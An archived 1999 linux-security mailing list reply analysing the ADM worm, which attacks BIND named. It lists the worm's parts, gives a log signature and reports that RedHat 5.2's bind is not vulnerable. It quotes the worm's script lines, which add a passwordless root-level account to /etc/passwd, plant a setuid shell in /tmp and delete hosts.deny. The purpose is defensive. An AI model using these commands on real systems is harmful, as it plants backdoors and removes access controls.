[2136] in linux-security and linux-alert archive
[linux-security] Re: [Security - intern] *ALERT*: ADM Worm. Worm
daemon@ATHENA.MIT.EDU (Sergio Ballestrero)
Fri Mar 26 10:34:27 1999
Date: Fri, 26 Mar 1999 15:05:15 +0100 (CET)
From: Sergio Ballestrero <s.ballestrero@c-sistemi.it>
To: Jan-Philip Velders <jpv@jvelders.tn.tudelft.nl>
cc: Thomas Biege <thomas@suse.de>, linux-security@redhat.com
In-Reply-To: <Pine.LNX.4.05.9903261134140.20702-100000@jp-gp.vsi.nl>
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
On Fri, 26 Mar 1999, Jan-Philip Velders wrote:
> On Fri, 26 Mar 1999, Thomas Biege wrote:
>
> > Date: Fri, 26 Mar 1999 09:34:10 +0100 (MET)
> > From: Thomas Biege <thomas@suse.de>
> > To: Jan-Philip Velders <jpv@jvelders.tn.tudelft.nl>
> > Cc: linux-security@redhat.com
> > Subject: Re: [Security - intern] [linux-security] *ALERT*: ADM Worm. Worm for
> Linux x86 found in wild.
>
> > The worm just exploits old security holes, so if you keep update with your
> > daemons you haven't fear about that worm.
>
> Eh, the guy who reported it on BugTraq said it was a RedHat 5.2 box.
> AFAIK 5.2 is fairly recent, and could only contain 'newer' holes, like the
> stuff with wu-ftpd...
>
> > Thomas
>
> Greetings,
> Jan-Philip Velders
I downloaded the worm, and i'm playing a bit with it, on two RH5.2 boxes.
As far as i understand from the logging by iplogd
(www.linuxvalley.org/~lserni) and from netstat, it only scans, and tries
to attack, named. And on my RH 5.2, with bind-8.1.2-5, it doesn't succeed.
The "network" part is made of:
gimmeRAND, that generates random IPs (apparently from time, since it's
the same if i call it consecutively)
incremental that generates a sequence of IPs starting from the random one
scanco that checks for the existance of a name service on the ip
test that test some vulnerability in named - i haven't seen which
one, possibly a buffer overflow.
Hnamed is the actual exploit of the named vulnerability, that does
some kind of "remote shell"
Al the damaging actions described (deleting logs, removing hosts.deny,
substituting all the index.html, creating a passwordless account) are done
in the script "w0rm".
The "outro" log file doesn't seem to be generated by ADMw0rm; i suppose
it's something made by some other tool, runned by hand by the intruder.
Also, the tgz available via ftp doesn't contain the "remotecmd"
executable that seems necessary for the spreading of the worm:
echo "lets hack"
./Hnamed $VICTIM /bin/sh -c "echo >> /etc/passwd; echo
\"w0rm::2666:777:ADM Inet w0rm:/:/bin/sh\" >> /etc/passwd; /bin/cp /bin/sh
/tmp/.w0rm; /bin/chmod 4777 /tmp/.w0rm; /bin/rm -f /etc/hosts.deny"
nohup ./remotecmd $VICTIM cmd 3000000 &
A signature of the attack is
Mar 26 13:56:59 pcsash named[5349]: stream_getlen([127.0.0.1].4256): Broken pipe
but it is not always seen (i haven't understood why)
just to be clear, let me repeat:
bind-8.1.2-5, distributed with RedHat 5.2, is _NOT_ vulnerable - at least
not to the version of ADMw0rm that was available via ftp.
Regards,
Sergio
--------------------------------------------------------------------------
ballestr@fi.infn.it <- Physics Sergio Ballestrero
sergio@ctt.it <- Business V. Marini 18
S.Ballestrero@iname.com <- Personal 59100 Prato ITALY
[mod: Ti Legget agrees: -- REW]
If I'm not mistaken this is a really old (but very hazardous) exploit of
the bind utilities. Turn off bind services, or if you need them upgrade to
the newest packages.
Ti Leggett
legget@mcs.anl.gov
tlegget@mailhost.tcs.tulane.edu
--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------
To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null
